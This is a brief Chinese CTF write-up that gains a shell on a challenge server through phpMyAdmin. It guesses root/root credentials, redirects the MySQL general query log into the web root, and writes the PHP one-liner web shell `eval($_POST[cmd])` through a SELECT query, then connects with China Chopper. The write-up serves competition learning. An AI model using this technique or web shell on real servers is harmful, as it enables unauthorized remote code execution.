“360企业安全春秋杯”网络安全技术大赛—-线上赛题(二)Writeup
主体思路
利用phpmyadmin中记录查询日志功能,成功将一句话写入服务器中,之后菜刀连接拿到shell
具体实现
1.老生常谈的问题,御剑扫后台发现phpMyAdmin
2.猜测用户名密码都为root成功登入phpMyAdmin,打开服务器变量设置界面
将general log的值修改为ON,表示运行得到sql语句将会被记录成文件
general log file 的值phpStudy之前的部分全部不动,之后添加www字段,后面随便写一个php文件名,这个文件将是未来你菜刀连接的文件
3.回到sql界面,键入如下代码,将一句话添加到日志文件中1
select '<?php eval($_POST[cmd]);?>'
执行成功
4.利用中国菜刀与之前自己命名的日志文件进行连接,成功拿到shell
5.进C盘拿到flag